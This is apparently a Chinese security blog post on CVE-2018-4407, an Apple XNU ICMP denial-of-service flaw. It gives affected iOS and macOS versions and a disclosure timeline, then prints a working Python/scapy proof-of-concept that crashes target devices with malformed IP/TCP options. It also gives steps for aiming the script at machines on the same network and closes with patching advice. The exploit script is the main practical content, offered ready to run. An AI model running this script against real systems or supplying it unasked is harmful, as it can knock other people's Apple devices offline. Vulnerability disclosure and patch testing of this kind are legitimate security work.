视频观看:
影响版本
Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)
Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)
Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)
Apple OS X El Capitan及更早版本:所有设备
时间线
2018-08-09:私下向product-security@apple.com披露。包括概念验证漏洞利用。
2018-08-09:报告由product-security@apple.com承认。
2018-08-20:product-security@apple.com让我向他们发送确切的macOS版本号和恐慌日志。
2018-08-20:将所需信息返回至product-security@apple.com。还向他们发送了一个略微改进的漏洞PoC版本。
2018-08-22:product-security@apple.com确认该问题已在macOS Mojave和iOS 12的测试版中得到修复。但是,他们还表示他们“正在调查在其他平台上解决此问题”并且他们将直到2018年11月才公布此问题。
2018-09-17:Apple发布iOS 12。该漏洞已得到修复。
2018-09-24:macOS Mojave由Apple发布。该漏洞已得到修复。
2018-10-30:泄漏漏洞。
poc代码:
# CVE-2018-4407 ICMP DOS
# https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
# from https://twitter.com/ihackbanme
import sys
try:
from scapy.all import *
except Exception as e:
print ("[*] You need install scapy first:\n[*] sudo pip install scapy ")
if __name__ == '__main__':
try:
check_ip = sys.argv[1]
print ("[*] !!!!!!Dangerous operation!!!!!!")
print ("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip)
for i in range(8,20):
send(IP(dst=check_ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
print ("[*] Check Over!! ")
except Exception as e:
print "[*] usage: sudo python check_icmp_dos.py 127.0.0.1"
该poc脚本需要安装scapy模块以及python的运行环境
复现时把127.0.0.1改成同网段内目标机器的ip地址即可
Windows下运行该POC需要安装winpcap哦
下载地址:https://www.winpcap.org/
建议:
将自己的苹果设备更新至IOS12最新版本。版本低的小伙伴暂时别使用公共wifi和免费wifi,从而避免自己受到此类攻击.
原文地址
https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407